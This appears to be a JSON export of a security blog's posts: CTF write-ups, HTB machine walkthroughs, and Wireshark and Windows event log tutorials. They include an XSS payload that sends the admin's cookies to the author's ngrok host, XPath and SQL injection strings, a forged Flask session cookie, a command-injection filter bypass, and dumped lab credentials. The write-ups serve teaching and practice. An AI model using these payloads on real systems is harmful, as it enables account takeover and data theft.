It was base64 encoded , so we decode it to get the flag\nX marks the spot In this challenge we are given a web application login field , i tried sql injection at first an an error was thrown\n1 SimpleXMLElement::xpath(): Invalid predicate in \u0026lt;b\u0026gt;/var/www/html/backend.php This indicated that the appication is vulnerable to xpath injection\nyou can check the payloads \u0026raquo; hacktricks xpath\ni tried the payload\n1 \u0026#39;or 1=1 or\u0026#39; this is able to bypass login and i get the result\n1 {\u0026#34;username\u0026#34;:\u0026#34;admin\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;supersecret\u0026#34;,\u0026#34;api-key\u0026#34;:\u0026#34;api-admin-key\u0026#34;} to move laterally through accounts i used the following payload , i achieved this after after trying lots of payloads\n1 \u0026#39;or position()=3 or\u0026#39; by changing the number above we can basically login as different users , in this case 3 gets us the flag.\nPS i got first blood on this challenge :)\n1 {\u0026#34;username\u0026#34;:\u0026#34;ali\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;654321\u0026#34;,\u0026#34;api-key\u0026#34;:\u0026#34;flag{s0m30n3_n33ds_1npu7_v4l1d4t10n}\u0026#34;} secrets For this challenge you are provided with a signin page and you can also register.\nWe have to manipulate the cookie to become the admin user. 
For this i used the tool flask-unsign , you can get it \u0026raquo; here\n1 2 3 flask-unsign --decode --cookie \u0026#34;.eJwljkFOBDEMBP-SM4fYjuN4PzOKYxtWiAHN7J4Qf2cQx26pSvVdtjzifCu3x_GMl7LdvdwKyJKcbQnKyJARCmralZw6kPrsiDrYxnSBmQ0SclBMrk5cRyUF55qcuRb2RSbDZGkjTsLBfXpQY21iyd2hUiYahseQBp2tXCHPM47_GuJrr_PI7fH5Hvv1rOE4Wpi4IjjMqmJx1UX1XqtPNKsa2C7uT7PPj7ior_v-Wn5-AZmVRW0.ZQ5wGQ.2gLkeklbQ2OS2GBjMTAi2uiVKWI\u0026#34; {\u0026#39;_fresh\u0026#39;: True, \u0026#39;_id\u0026#39;: \u0026#39;17c7fa4c7278fe78e919b9693d36139da622985b8ad71af41f1f83ea50d35080391d50f5ffcc26c3b78b7c9435f32856ade345947bf56d103ff2b2ede874165b\u0026#39;, \u0026#39;_user_id\u0026#39;: \u0026#39;35\u0026#39;, \u0026#39;csrf_token\u0026#39;: \u0026#39;c8d284eb7d921d1a097be93de0d600da2bb09e24\u0026#39;, \u0026#39;username\u0026#39;: \u0026#39;ping\u0026#39;} We then have to change the uid to 1 and username to admin and then sign the cookie with secretkey \u0026lsquo;SheHacks\u0026rsquo;\n1 2 3 4 flask-unsign --sign --cookie \u0026#34;{ \u0026#39;_user_id\u0026#39;: \u0026#39;1\u0026#39;, \u0026#39;username\u0026#39;: \u0026#39;admin\u0026#39;}\u0026#34; --secret \u0026#39;SheHacks\u0026#39; eyJfdXNlcl9pZCI6IjEiLCJ1c2VybmFtZSI6ImFkbWluIn0.ZQ59CA.CUKCpa3SPstLemcqmuEDrSqmpFI Using this cookie we can get the flag : flag{s3c3ts_4re_n0_l0ng3r_s4f3}\nforensics category\nSnifferDog1 How many packets in total passed through port 445 shctf{Ans}\nFor this we just use the filter \u0026ldquo;tcp.port == 445\u0026rdquo; then check the bottom right of wireshrk for number of packets shctf{10223}\nSniffer Dog2 What is the 6th disallowed item listed in http://192.168.56.103:8081/robots.txt?\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103 \u0026amp;\u0026amp; tcp.port == 8081 \u0026amp;\u0026amp; http\u0026rdquo; then find \u0026ldquo;robots.txt\u0026rdquo;\nshctf{installation}\nSnifferDog3 What version of Jenkins is running on 192.168.56.103? 
shctf{VersionOnly}\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103\u0026rdquo; then find \u0026ldquo;jenkins\u0026rdquo;\nshctf{1.647}\nSnifferDog4 What is the domain SID for 192.168.56.103 shctf{S\u0026hellip;}\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103\u0026rdquo; then find \u0026ldquo;S-1-5\u0026rdquo; this is the format for sid you can learn more \u0026raquo; here\nshctf{S-1-5-21-2950693484-2233299975-203034155}\n","date":"2023-09-22T14:29:32+03:00","image":"https://f0rk3b0mb.github.io/cover/shehacks.png","permalink":"https://f0rk3b0mb.github.io/p/shehacks_intrervasity_2023/","title":"Shehacks_intrervasity_2023"},{"content":"Windows event log analysis is an important skill in threat hunting. These logs silently record system events, security incidents, and user interactions, providing crucial insights into system health and security. In this blog, we will explore the art of Windows Event Log analysis\nIm going to discuss log analysis of windows events in linux, we will be utilizing a tool called chainsaw, you can get it \u0026raquo; here.\nIn this tutorial i will be analysing the files from cybertalents blue scholarship.\n1. chainsaw search an attacker after compromising the machine added a new account as admin. can you find the name of the new account? flag format : flag{md5 of string}\nfile \u0026raquo;\u0026raquo; ex1\nIn windows, each event has a unique event id. So we have to find event id for account creation , a quick google search\nThen in chainsaw\n1 2 ./chainsaw/chainsaw-gnu search -t \u0026#39;Event.System.EventID: =4720\u0026#39; Security436509324654726509.evtx Here we can filter events with the event id 4720.\nSAM means security account manager , it is a database that stores accounts on windows systems. Usename is sam md5hash ba0e0cde1bf72c28d435c89a66afc61a.\nflag{ba0e0cde1bf72c28d435c89a66afc61a}\n2. 
chainsaw hunt file \u0026raquo;\u0026raquo; here\n1 2 3 4 5 6 7 Our network got compromised two days ago by an unknown attacker, and we need to get an answer for the following questions: 1. What is the domain\u0026#39;s SID? 2. The attacker failed to login to some accounts, What is the attacker\u0026#39;s machine IP address? 3. What is the workstation\u0026#39;s name that the attacker was using to authenticate with the administrator account? Flag format: Flag{ANS1_ANS2_ANS3} Since this is account failed login it has event id 4776 for failed login from domain controller. The domain controller in this case is HYDRA-DC.MARVEL.local.\nSince chainsaw has rules to detect certain events , you can use the folowing command to hunt for events\n1 2 ./chainsaw/chainsaw-gnu hunt -r ./chainsaw/rules/ logs.evtx This returns alot of output , but retuns events in a format we can easily comprehend.\n1 2 ./chainsaw/chainsaw-gnu hunt --sigma ./chainsaw/sigma/ --mapping ./chainsaw/mappings/sigma-event-logs-all.yml -r ./chainsaw/rules/lateral_movement/ logs/ You can use the command above to get more info. Now here is where the fun begins.\nFrom the logs we can see that there are several users lke pbarker,fcasle, Administrator and these avents are have a common ipaddress \u0026ldquo;192.168.80.128\u0026rdquo;\nIf we search for the following users in the sigma output , we can find the sid\npbarker : S-1-5-21-271597537-2992796785-3713134209-1105\nfcastle: S-1-5-21-271597537-2992796785-3713134209-1103\nAdminitrator : S-1-5-21-271597537-2992796785-3713134209-500\nThe structure of an sid is as follows :\nS-1-5-21--\u0026lt;relative_id\u0026gt;\nWhere:\nS: A constant prefix indicating that it is a Security Identifier.\n1: Revision number (currently always 1).\n5: Identifier authority value (the identifier authority for Windows is always 5).\n21: The identifier authority\u0026rsquo;s top-level domain identifier. 
The actual number may vary depending on the Windows version or configuration but is typically 21 for Windows domains.\n: The SID for the domain. It is a unique value assigned to each domain by the domain controller during domain creation.\n\u0026lt;relative_id\u0026gt;: A relative identifier that uniquely identifies a specific security principal within the domain. For users and groups, this relative ID is usually the RID (Relative Identifier) assigned by the domain controller.\nso in this case domain sid is \u0026ldquo;S-1-5-21-271597537-2992796785-3713134209\u0026rdquo;\nTo get the workstation you can ue the command we used earlier to filter events using event id\n1 2 ./chainsaw/chainsaw-gnu search -t \u0026#39;Event.System.EventID: =4776\u0026#39; logs/ | grep -i workstation workstation: THEPUNISHER\nflag is Flag{S-1-5-21-271597537-2992796785-3713134209_192.168.80.128_THEPUNISHER}\n","date":"2023-07-31T16:18:16+03:00","image":"https://f0rk3b0mb.github.io/cover/4020769.jpg","permalink":"https://f0rk3b0mb.github.io/p/windows-events-and-log-analysis/","title":"Windows events and log analysis"},{"content":"ImaginaryCTF Imaginaryctf web writeups Idoriot This web challenge was very simple , while registering a new user you could set their id , so just set user_id as 0 and login to get the flag.\nIdoriot revenge This challenge is related to the first one but we can set the user id as a parameter , in the source , there is this filter\n1 2 3 4 5 6 7 8 9 10 11 if (isset($_GET[\u0026#39;user_id\u0026#39;])) { $user_id = (int) $_GET[\u0026#39;user_id\u0026#39;]; // Check if the user is admin if ($user_id == \u0026#34;php\u0026#34; \u0026amp;\u0026amp; preg_match(\u0026#34;/\u0026#34;.$admin[\u0026#39;username\u0026#39;].\u0026#34;/\u0026#34;, $_SESSION[\u0026#39;username\u0026#39;])) { // Read the flag from flag.txt $flag = file_get_contents(\u0026#39;/flag.txt\u0026#39;); echo \u0026#34;\u0026lt;h1\u0026gt;Flag\u0026lt;/h1\u0026gt;\u0026#34;; echo 
\u0026#34;\u0026lt;p\u0026gt;$flag\u0026lt;/p\u0026gt;\u0026#34;; } } it checks if the user_id is equal to \u0026ldquo;php\u0026rdquo; and if the username contains \u0026ldquo;admin\u0026rdquo;.\nThis is classic php type juggling read more \u0026raquo; here there is also a chart on the pdf showing what will be regerded as True or False in php, in this case if i set user_id=0 it will be equal to \u0026ldquo;php\u0026rdquo;. For the username , register any user with a username that contains \u0026ldquo;admin\u0026rdquo; but not \u0026ldquo;admin\u0026rdquo; like eg (admino) to satisfy the regex check.\nBlank This challenge tested knowledge is sql.\n1 2 db.get(\u0026#39;SELECT * FROM users WHERE username = \u0026#34;\u0026#39; + username + \u0026#39;\u0026#34; and password = \u0026#34;\u0026#39; + password+ \u0026#39;\u0026#34;\u0026#39;, (err, row) =\u0026gt; { as you can see , user input is directly added to the sql statement which is very dangerous. Also the application was not checking the password.\n1 2 3 4 app.get(\u0026#39;/flag\u0026#39;, (req, res) =\u0026gt; { if (req.session.username == \u0026#34;admin\u0026#34;) { res.send(\u0026#39;Welcome admin. The flag is \u0026#39; + fs.readFileSync(\u0026#39;flag.txt\u0026#39;, \u0026#39;utf8\u0026#39;)); } THe username had to be \u0026ldquo;admin\u0026rdquo;. 
so we can only inject via password field\nThis will satisfy this part of the code and return rows\n1 2 3 4 5 if (row) { console.log(row,req.session.username); req.session.loggedIn = true; req.session.username = username; res.send(\u0026#39;Login successful!\u0026#39;); Perfect picture This challenge required uploading a picture with specific characterictics\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 def check(uploaded_image): with open(\u0026#39;flag.txt\u0026#39;, \u0026#39;r\u0026#39;) as f: flag = f.read() with Image.open(app.config[\u0026#39;UPLOAD_FOLDER\u0026#39;] + uploaded_image) as image: w, h = image.size if w != 690 or h != 420: return 0 if image.getpixel((412, 309)) != (52, 146, 235, 123): return 0 if image.getpixel((12, 209)) != (42, 16, 125, 231): return 0 if image.getpixel((264, 143)) != (122, 136, 25, 213): return 0 with exiftool.ExifToolHelper() as et: metadata = et.get_metadata(app.config[\u0026#39;UPLOAD_FOLDER\u0026#39;] + uploaded_image)[0] try: if metadata[\u0026#34;PNG:Description\u0026#34;] != \u0026#34;jctf{not_the_flag}\u0026#34;: return 0 if metadata[\u0026#34;PNG:Title\u0026#34;] != \u0026#34;kool_pic\u0026#34;: return 0 if metadata[\u0026#34;PNG:Author\u0026#34;] != \u0026#34;anon\u0026#34;: return 0 except: return 0 return flag to satisfy those i wrote a python script\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 from PIL import Image def create_and_modify_image(): # Step 1: Create the Image width, height = 690, 420 image = Image.new(\u0026#34;RGBA\u0026#34;, (width, height), (255, 255, 255, 0)) # Step 2: Modify Pixel Colors image.putpixel((412, 309), (52, 146, 235, 123)) image.putpixel((12, 209), (42, 16, 125, 231)) image.putpixel((264, 143), (122, 136, 25, 213)) # Step 3: Save the Image image.save(\u0026#34;created_image.png\u0026#34;) if __name__ == \u0026#34;__main__\u0026#34;: create_and_modify_image() you also have to run the following command to set the exit data\n1 2 exiftool 
-PNG:Description=\u0026#34;jctf{not_the_flag}\u0026#34; -PNG:Title=\u0026#34;kool_pic\u0026#34; -PNG:Author=\u0026#34;anon\u0026#34; created_image.png Roks This challenge was obviously an lfi\nphp urldecode() only decodes once i.e it only decodes one layer , so if i encode on several layers i can bypass the filter which only decoded 2 layers\nthe flag was at ../../../../flag.png according to the dockerfile , urlencode this 3 times and send it to get the flag\nLogin This challenge tested knowledge in sql and bcrypt hashing.\nUsing sqlmap you could extract the database table users and data\n1 2 3 4 pwhash,username $2y$10$vw1OC907/WpJagql/LmHV.7zs8I3RE9N0BC4/Tx9I90epSI2wr3S.,guest $2y$10$Is00vB1hRNHYBl9BzJwDouQFCU85YyRjJ81q0CX1a3sYtvsZvJudC,admi the hashes are clearly bcrypt\nto login as admin we can use the following sql statement. I got it from \u0026raquo; here . Here we can set our own bcrypt hash which we have knowledge of the password.\n1 2 3 4 5 xxx\u0026#39; UNION SELECT \u0026#39;admin\u0026#39; AS username,\u0026#39;$2y$10$C4lfi0f8kouggVBFkKF1ru./NEQTKqptjJCh6JI/hJieELWHLeFXi\u0026#39; AS pwhash-- and the password as \u0026#34;a\u0026#34; Here we get the magic , in my case it was \u0026ldquo;688a35c685a7a654abc80f8e123ad9f0\u0026rdquo;\nIn the code if we supply the magic as a get parameter the flag will be appended to the password , Bcrypt has a character limit of 72 , so if we set a password of more than 72 characters it will be truncated and only the first 72 characters will be hashed as the password . 
I had seen technique in an ippsec video recently https://www.youtube.com/watch?v=E5TOeiCnGkE\u0026amp;t=3183s , Luckyme :)\nAnyways here is the exploit \u0026raquo; here\nflag : ictf{why_are_bcrypt_truncating_my_passwords?!}\n","date":"2023-07-23T12:41:18+03:00","image":"https://f0rk3b0mb.github.io/cover/imaginary_ctf.jpg","permalink":"https://f0rk3b0mb.github.io/p/imaginaryctf2023/","title":"ImaginaryCTF2023"},{"content":"Wireshark packet analysis (basic) To demonstrate this, I will be analyzing a pcap from bicWC. You can also download this pcap and follow along \u0026raquo; here.\nYou can also download this \u0026raquo; here. I will use this pcap to demonstrate how to extract files from captured network traffic.\nDEMO 1 How many packets have been captured?\nThe number of packets is shown at the right bottom of the screenshot above: 1309\nWhat is the IP address of the attacker?\nHere we will use the TCP filter in Wireshark as shown below:\nThe IP address is 45.15.156.72\nWhich city is the IP address based in?\nWe will use an online IP locator tool:\nThe city is Amsterdam\nHow many DNS servers are in the pcap?\nHere we just use the DNS filter in Wireshark:\nThe answer is two. There is one with IP xxx.100 and xxx.101\nWhat is the IP of the NTP server?\nHere we will use the NTP filter in Wireshark:\nThe IP address, as you can see above, is 51.145.123.29\nWhat machine ID was transmitted to the attacker?\nHere we will follow the TCP stream of one of the requests to the attacker as shown below. This time we will use the IP address filter \u0026lt;ip.addr == 45.15.156.72\u0026gt;:\nThe machine ID is a parameter of the POST request.\nWhat is the user-agent?\nAs you can see from the picture above, the user-agent is \u0026ldquo;x\u0026rdquo;\nWhat was the MAC address of the compromised machine?\nWe just have to double click on one of the TCP packets between the attacker and compromised machine as shown below. 
The MAC address is on the blue line I have highlighted:\nWhat email address is the registrar of the IP address?\nHere we will conduct a WHOIS search on the IP address. To make it even easier, we will combine it with a grep filter for the @ symbol, which is used in email addresses:\nDEMO 2 Scrolling through the pcap, you can see weird filenames ending in .ts. I googled this and found out that it is a file extension for video files.\nTo extract files, you will first have to identify the stream of the files you want to extract. In this case, it\u0026rsquo;s stream 3. Select packet \u0026gt; right click \u0026gt; follow TCP stream.\nYou can move through subsequent streams by using the stream buttons:\nYou now have to export the stream to a file. In my case, I called the file filtered.pcapng:\nOpen the filtered.pcapng in Wireshark. Go to File \u0026gt; Export Objects \u0026gt; HTTP:\nYou can click on each and then save. The resulting files can be opened with any video player. The flag is in WyK2SW5mcYDArna2IlwZ4C4SwDjZ717a5.ts.\nThe above challenges are a good entry to learning to use Wireshark and understanding networking.\n","date":"2023-07-14T11:47:02+03:00","image":"https://f0rk3b0mb.github.io/cover/5613.jpg","permalink":"https://f0rk3b0mb.github.io/p/packet-analysis-using-wireshark/","title":"Packet analysis using Wireshark"},{"content":"Nahamcon CTF 2023 writeups warmups blobber Thic challenge had a downloadable part , the file was a sqlite database.\nI opened the file using sqlite database browser\nbrowsing the data there is only gibberish , except on line 238 where data is a blob object.Blobs in sqlite is whereby files can be addedtto database as entries. 
Read more here\nwe can use this sql statement to get the blob\n1 2 select data from blobber where id=238 Then save it to a file , the resulting file in is a bzip2 archive, extracting , you get an image of the flag\nninety one In this challenge you are provided with an encoded string\n1 @iH\u0026lt;,{|jbRH?L^VjGJH\u0026lt;vn3p7I,x~@1jyt\u0026gt;x?,!YAJr*08P I used this tool \u0026raquo; here to analyse and decode it , it was encrypted using base91 encoding\n1 2 flag{dfb88c7d9ca38e71dc27e1072fc43d1b} glasses This challenge you were provided with a webpage. It had no functionality, based on the title of the challenge it is obvious that we nee to find something hidden.\nLokking through the source I found obfuscated js code. You can use this tool \u0026raquo; here to deobfuscate it . It returns html code the with the flag\n1 2 flag{8084e4530cf649814456f2a291eb81e9} web category starwars In this challenge you are provided with a web endpoint that allows you to signup and login The goal is to login as admin , you can also comment and the admin reviews your comment , obvoiusly it is classic xxs\nthis below is the payload i used . it fetches my ngrok endpoint with the cookie appanded at the end. I dont know if the first part was necessary , I generated it by trial and error and it worked\n1 2 3 4 5 6 \u0026#34;\u0026gt;\u0026lt;script\u0026gt; var iframe = document.body.appendChild(document.createElement(\u0026#39;iframe\u0026#39;)); iframe.style.cssText = \u0026#39;height: 500px; width: 100%\u0026#39;; iframe.src = \u0026#39;http://challenge.nahamcon.com:30467/signup\u0026#39;; iframe.onload = function() { fetch(\u0026#39;http://f910-102-167-145-177.ngrok-free.app?iframeContents=\u0026#39; + btoa(window.document.cookie), { method: \u0026#39;GET\u0026#39; }).then(response =\u0026gt; response.json()).then(data =\u0026gt; console.log(data)).catch(error =\u0026gt; console.error(error)); };\u0026lt;/script\u0026gt; the flag will be returned in base64 format. 
Use it in the browser to access /admin page and the flag\nmisc category zombies In this challenge you were provided with an ssh endpoint to connect to\nreading the file .user-entrypoint.sh\nnohup is enables a program to run even after a terminal window is closed , if you check running processes you can see that tail is still running. Running processes usually have the activities stored in /proc directory. in the image below 11 is the pid of the tail process\nmobile category This challenge requires a set of tools to be able to do anything :\ndex2jar\njdgui\nghidra\ngenymotion \u0026laquo; android emulator on pc\nadb\napktools\njninjaspeak In this challnge you are provided with an apk file , you can install it on genymotion using adb, it is a simple prompt that converts input to jninjaspeak.\n1 adb install jninjaspeak.apk Decompile the application using apktool\n1 2 use : apktool -r -s d jninjaspeak.apk We use -r -s flags to tell apktool not to decompile the dexfiles to smali which it does by default.\nConvert the dex files to jar using dex2jar to be able to view the source using jdgui.\nIn the mainactivity we see that the program needs libjninjaspeak.so liblary that is used to translate the input.\nHere we use ghidra to reverse engineer the liblary , the liblary is in the /lib in the folder apktool generated.\nIn ghidra , in the main function of the liblary we find the flag\nflag{1f539e4a706e6181dae9db3fad6a78f1}\nFortune teller For this challenge follow the above steps to install and decompile the application and convers dex files to jar.\nThe mainactivity function in located the classes3.dex. Looking closely you can see that the application uses our input as a key to decrypt an encrypted file , the encryption used is AES.\nThe file is decrypted in the decrypt.class. 
Where our input is used in the SecretKeySpec object.\nBased on my simple java programming undertanding :) there is a variable called correctString that is initialized in the main function.\nIt is followed by its getter function\nand then tracing it we find the setter function\nIt sets correctString to the value by resource id 2131755048 . Resource ids can be traced what that point to in the classes2.dex, path is shown below\nIt is point to a string , the resorces can be found the /res folder since the value is a string we goto /res/values and cat strings.xml.\nThe key is \u0026ldquo;you won this ctf\u0026rdquo; , enter it and get the flag\nwheres waldo In this challenge you are provided with an apk file , follow the steps above to decompile it and open the sources in jd gui and install it in the emulator.\nThis application is some type of maps applcation so the objective is to find the location of waldo in the map.\nAnalysing the mainactivity function you can see thet the application is making a request to an endpoint which determines id we have found waldo and the distance from him\nThe objective is to set longitude and latitude that results on the off_by value to result to zero as you can see below\n1 2 3 4 mapView1.getController().setCenter((IGeoPoint)new GeoPoint(location.getLatitude(), location.getLongitude())); Request request = (new Request.Builder()).url(\u0026#34;http://challenge.nahamcon.com:30001/location?lat=\u0026#34; + location.getLatitude() + \u0026#34;\u0026amp;long=\u0026#34; + location.getLongitude()).build(); Response response = (new OkHttpClient()).newCall(request).execute(); the code above takes the off_by and calculates the distance from waldo by miles.\nI scripted this python program to do all the hardwork (at least).\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 import requests def calculate_distance(latitude, longitude): url = 
f\u0026#39;http://challenge.nahamcon.com:30001/location?lat={latitude}\u0026amp;long={longitude}\u0026#39; print(url) # Replace with the actual API endpoint response = requests.get(url) print(response.text) data = response.json() off_by = data.get(\u0026#34;off_by\u0026#34;) i = off_by print(i) return(i) def move(): pos=list() for x in range(-180,180,30): for y in range(0,30,2): dis=calculate_distance(y,x) pos.append(list) print(pos) move() The code above i used to be able to narrow down on which coordinated produces the least distance from waldo\n1 2 3 4 lat=30\u0026amp;long=-60 low 1099.613580066382 this was the lowest from here i entered the values manually by trying raising the value higher or lower and chacking the changes in the distance\nat lat=40.60 and long -74.67 we needed to go even smaller units so i researched and found out that api use the following format to show distance\n1 2 3 4 Latitude: ±DD.DDDDDD Longitude: ±DDD.DDDDDD where D is any number between 1-9 final position lat=40.583333 and long=-74.67\n","date":"2023-06-15T20:58:33+03:00","permalink":"https://f0rk3b0mb.github.io/p/nahamcon2023/","title":"Nahamcon2023"},{"content":"htb pc writeup category: web\ndifficulty: easy\nHello, and welcome to another walkthrough of a htb machine.\nWhen you run a port scan on the target we get port 22 open , a full port scan reveals port 50015 that nmap cannot tell the service which it is running\n1 2 open port 22 open port 50015 a little reserarch i found out that the service is grpc \u0026raquo; for more datails of what it is here\nTo interect with grpc we need some tools one of them is called grpcurl and there is also grpcui\nThey are golang application so you need to have goland installed on your machine.\nIn this procudure i am going to use grpcui , the difference between the two is one has ui and the other is cli.\nwe create a new user test:test, we login in and are given a jwt token. 
I f we make a request to the getinfo() we receive response as shown below.\nThere is an id field we can try different ids and it returns an error , if you append a single quot it returns a format error , this is a good indicator of sqli.\n1 \u0026#34;message\u0026#34;: \u0026#34;Unexpected \\u003cclass \u0026#39;TypeError\u0026#39;\\u003e: bad argument type for built-in operation\u0026#34; I saved the request in a file and fired up sqlmap\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 POST /invoke/SimpleApp.getInfo HTTP/1.1 Host: 127.0.0.1:41553 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json x-grpcui-csrf-token: ceu1ZeLii2J61yGbIh69ZsqYUUhVJ9vURydGc1b27KY X-Requested-With: XMLHttpRequest Content-Length: 190 Origin: http://127.0.0.1:41553 Connection: close Referer: http://127.0.0.1:41553/ Cookie: wp-settings-1=libraryContent%3Dbrowse; _grpcui_csrf_token=ceu1ZeLii2J61yGbIh69ZsqYUUhVJ9vURydGc1b27KY Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin {\u0026#34;metadata\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;token\u0026#34;,\u0026#34;value\u0026#34;:\u0026#34;eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdCIsImV4cCI6MTY4NjMyMTkzMX0.L624cRHm_TXyUSDTBU14H82b2DNq44JacxN9XfT1cKU\u0026#34;}],\u0026#34;data\u0026#34;:[{\u0026#34;id\u0026#34;:\u0026#34;1*\u0026#34;}]} I added * next to the id number to tell sqlmap to test that field . NOTE: if you dont do this sqlmap will run tests on the outer json only.\nHere are the tables and data of table accounts\n1 2 3 4 5 6 7 8 9 10 11 12 13 +----------+ | accounts | | messages | +----------+ +------------------------+----------+ | password | username | +------------------------+----------+ | admin | admin | | HereIsYourPassWord1431 | sau | +------------------------+----------+ We can login to ssh as the user sau. 
The we read user.txt\nI uploaded linpeas.sh to the target and ran it , I found out that there was a webserver listening on port 127.0.0.1:8000. To access it on our machine we can use a technique known as ssh port forwarding.\n1 2 3 4 5 Here is the command ssh -L 8000:localhost:8000 sau@10.10.11.214 It will map port 8000 on the server to port 8000 locally Visiting the url we find out it is a login page of pyload. Since we dont have login creds , I searched for exploits aganist pyload and luckily there is an unathenticated rce.\nI used this exploit to understand more on how i works , here.\nRunning the exploit we get are root :() and we can read root.txt.\nREFERENCES for gprc and other ways to expoit it:\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-1-c0059362c4b5\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-2-b1fd38f8cd88\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-3-c92f3b687dd9\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-4-f1c260bbb00a\n","date":"2023-06-09T17:22:15+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb-pc/","title":"HTB PC"},{"content":"HTB monitortwo writeup categoty : web\ndifficulty : easy\nAs always we begin with a port scan\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 Starting Nmap 7.80 ( https://nmap.org ) at 2023-06-02 12:45 EAT Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 56.80% done; ETC: 12:46 (0:00:15 remaining) Nmap scan report for 10.10.11.211 Host is up (0.28s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Login to Cacti Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. 
Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 53.63 seconds As you can see there is a web interface , it is a login page and it utilizes something called cacti version 1.2.22\nUsing searchsploit :\nrunning the exploit, BOOM!! we get a reverse shell\nLooking around there is nothing really interesting , i ran linpeas and all i could find was a suid binary called capsh , you can check out how to exploit it here\nbut there was nothing in the root folder , turns out we were in a docker container that ran the webserver.The file that caught my attention was entrypoint.sh in the root folder.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 #!/bin/bash set -ex wait-for-it db:3306 -t 300 -- echo \u0026#34;database is connected\u0026#34; if [[ ! $(mysql --host=db --user=root --password=root cacti -e \u0026#34;show tables\u0026#34;) =~ \u0026#34;automation_devices\u0026#34; ]]; then mysql --host=db --user=root --password=root cacti \u0026lt; /var/www/html/cacti.sql mysql --host=db --user=root --password=root cacti -e \u0026#34;UPDATE user_auth SET must_change_password=\u0026#39;\u0026#39; WHERE username = \u0026#39;admin\u0026#39;\u0026#34; mysql --host=db --user=root --password=root cacti -e \u0026#34;SET GLOBAL time_zone = \u0026#39;UTC\u0026#39;\u0026#34; fi chown www-data:www-data -R /var/www/html # first arg is `-f` or `--some-option` if [ \u0026#34;${1#-}\u0026#34; != \u0026#34;$1\u0026#34; ]; then set -- apache2-foreground \u0026#34;$@\u0026#34; fi exec \u0026#34;$@\u0026#34; As you can see , we can use that format to run mysql statements.I used the following to dump users in the user_auth table.\n1 mysql --host=db --user=root --password=root cacti -e \u0026#34;SELECT * FROM user_auth\u0026#34; We get that there are 3 user accounts, admin, guest and marcus and their password hashes.I saved the hashes to a file and let john-the-ripper do its thing.\nI tried logging in the webpage but i got access denied and 
then tried ssh login as marcus, BOOM!! i am now marcus.\nWe can read the user.txt in the home folder\nI tried running linpeas again but still got nothing , also checked suid binaries but still nothing , at this point i did not know what to do.\nI got a hint that there was a docker vulnerability that resulted in privilledge escalation , you can read more and get the exploit here CVE-2021-41091\nFor this exploit to work you will utilize the capsh privesc we had discovered earlier in the reverse shell to set the \u0026ldquo;chmod u+s bash\u0026rdquo; .\nthen we execute the bash binary above as the in the marcus ssh session, BOOM!! root baby!!\nGoodbye ;)\n","date":"2023-06-02T16:31:02+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb-monitortwo/","title":"HTB Monitortwo"},{"content":"check it out on my github \u0026raquo; here\n","date":"2023-05-31T13:03:23+03:00","permalink":"https://f0rk3b0mb.github.io/p/bic-winter-con-2023/","title":"Bic winter con 2023"},{"content":"check it out on my github \u0026raquo; here\n","date":"2023-05-31T12:59:47+03:00","image":"https://f0rk3b0mb.github.io/cover/ca-logo-2023.webp","permalink":"https://f0rk3b0mb.github.io/p/htb-cyberapocalypse-2023/","title":"htb cyberapocalypse 2023"},{"content":"xee1 category: web\nsolution From the title you can tell this is a classic xxe challenge , when you capture the login request in burp repeater you will realize that the username is echoed out , so we have to make sure the output of our xxe payload is reflected in the page through the user name field.\nI crafted a payload to read /flag.txt , we also need to pass it through a php filter , we get the flag in base64 format\nxee2 category: web\nsolution This challenge is a subsequent of xxe2 but required a more complex approach, this time we have to receive the flag remotely since our user input is not being reflaected in the site , this is known as blind xxe . 
You can read more about it here\nso after some research i created thhis payload that reads the /flag.txt and sends it to a ngrok endpoint, ps we also have to pass read the flag through a php filter\nI get a hit and we can decode the flag from base64 as shown below\nBing category: web\nsolution This was a little complicated , i saw it as more of a bash jail than a web challenge.\nBasically you wegiven a simple site with page that would serve the flag, there was clearly command injection , cince you could run the i command. There was also a poor attempt at a regex filter at the frontend so this challnge could only be solved using burp.\nfile reading commands like cat were blocked also spaces , so you had to try any command you knew to read a file. Heres the solution:\n\u0026lsquo;head$IFS/fl??.txt|rev\u0026rsquo;\nwithout the rev the page will not display there may be a flag filter , so we reverse it\n","date":"2023-05-21T12:44:03+03:00","image":"https://f0rk3b0mb.github.io/cover/deadsec.jpeg","permalink":"https://f0rk3b0mb.github.io/p/deadsec-2023/","title":"Deadsec 2023"}] \ No newline at end of file diff 